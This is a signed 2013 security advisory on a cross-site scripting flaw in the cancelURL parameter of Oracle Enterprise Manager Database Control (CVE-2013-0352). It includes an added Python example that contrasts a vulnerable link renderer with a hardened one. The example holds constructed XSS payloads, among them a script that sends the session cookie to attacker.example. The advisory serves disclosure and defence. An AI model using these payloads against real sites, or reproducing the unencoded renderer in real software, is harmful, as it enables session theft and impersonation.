-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1
TeamSHATTER Security Advisory
Oracle Enterprise Manager Cross Site Scripting in XDBResource cancelURL
parameter
February 20, 2013
Risk Level:
High
Affected versions:
Oracle Enterprise Manager Database Control 10.2.0.3, 10.2.0.4, 10.2.0.5,
11.1.0.7, 11.2.0.2, 11.2.0.3
Remote exploitable:
Yes
Credits:
This vulnerability was discovered and researched by Qinglin Jiang of
Application Security Inc.
Details:
The XML Database Resources (XDBResource) page of Oracle Enterprise Manager
Database Control is vulnerable to cross-site scripting through its cancelURL
parameter. An attacker can inject malicious code into the web application and
trick a legitimate user into executing it by various methods, typically by
luring the user to a crafted link. The malicious code is usually a script and
runs in the user's browser in the context of that user's session. If the user
is in a trusted domain or is already authenticated, the attacker may be able to
steal the session cookie, impersonate the user, and perform unauthorized
operations in the web application.
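The following illustrates the bug class described above: a cancelURL-style
parameter reflected into the page without output encoding, beside a hardened
rendering that restricts the value to a site-relative path and HTML-encodes it.
This is an added example written for this advisory page, not Oracle's code and
not the actual Database Control handler; the function names, the default path
/em/console and the payloads are all constructed for illustration.

```python
"""Reflected XSS through a "cancelURL"-style parameter: vulnerable vs. hardened.

Hypothetical handler written to illustrate the advisory; it is not the
Oracle Enterprise Manager Database Control code.
"""
import html
from urllib.parse import urlsplit

DEFAULT_CANCEL = "/em/console"  # assumed fallback target, constructed for the example

# Constructed payloads (not taken from the advisory).
PAYLOAD_SCRIPT = (
    '"><script>document.location="http://attacker.example/?c="'
    "+document.cookie</script>"
)
PAYLOAD_JAVASCRIPT_SCHEME = "javascript:alert(document.cookie)"
PAYLOAD_OPEN_REDIRECT = "//attacker.example/phish"


def render_cancel_link_vulnerable(cancel_url: str) -> str:
    """Reflects the untrusted parameter straight into an HTML attribute.

    A value containing a closing quote breaks out of the attribute and the
    rest of the payload is rendered as markup, so any script it carries runs
    in the victim's session.
    """
    return f'<a href="{cancel_url}">Cancel</a>'


def safe_cancel_url(cancel_url: str, default: str = DEFAULT_CANCEL) -> str:
    """Accept only a site-relative path; anything else falls back to `default`.

    HTML encoding alone does not make an href safe: "javascript:" URLs and
    protocol-relative "//host" redirects survive encoding, so the value is
    validated first.
    """
    if not cancel_url or "\\" in cancel_url:
        return default
    try:
        parts = urlsplit(cancel_url)
    except ValueError:
        return default
    if parts.scheme or parts.netloc:
        return default
    if not cancel_url.startswith("/") or cancel_url.startswith("//"):
        return default
    return cancel_url


def render_cancel_link_hardened(cancel_url: str) -> str:
    """Validate the parameter, then HTML-encode it for the attribute context."""
    return f'<a href="{html.escape(safe_cancel_url(cancel_url), quote=True)}">Cancel</a>'


if __name__ == "__main__":
    for payload in (PAYLOAD_SCRIPT, PAYLOAD_JAVASCRIPT_SCHEME, PAYLOAD_OPEN_REDIRECT):
        print("vulnerable:", render_cancel_link_vulnerable(payload))
        print("hardened:  ", render_cancel_link_hardened(payload))
```

The vulnerable rendering emits the attacker's `<script>` element verbatim; the
hardened one replaces every unacceptable value with the default path and
encodes the legitimate ones, so a query string such as `/em/console?x=1&y=2`
is emitted with `&amp;` and cannot terminate the attribute.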
Impact:
An attacker may steal a legitimate user's session cookie, impersonate that
user, and perform unauthorized operations in the web application.
Vendor Status:
Vendor was contacted and a patch was released.
Workaround:
There is no workaround for this vulnerability.
Fix:
Apply the Oracle Critical Patch Update (CPU) of January 2013.
CVE:
CVE-2013-0352
Links:
http://www.oracle.com/technetwork/topics/security/cpujan2013-1515902.html
https://www.teamshatter.com/?p=4125
Timeline:
Vendor Notification - 6/25/2012
Vendor Response - 6/29/2012
Fix - 1/15/2013
Public Disclosure - 2/20/2013
- --
_____________________________________________
Copyright (c) 2013 Application Security, Inc.
http://www.appsecinc.com
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.4.11 (MingW32)
iEYEARECAAYFAlEmbNsACgkQRx91imnNIgEXXwCfXMTXf0nmulBLrzLiW7PJ5oDF
8CgAoK1NSJ0yR1HAaRm/P8B53i3sU/Om
=TB1N
-----END PGP SIGNATURE-----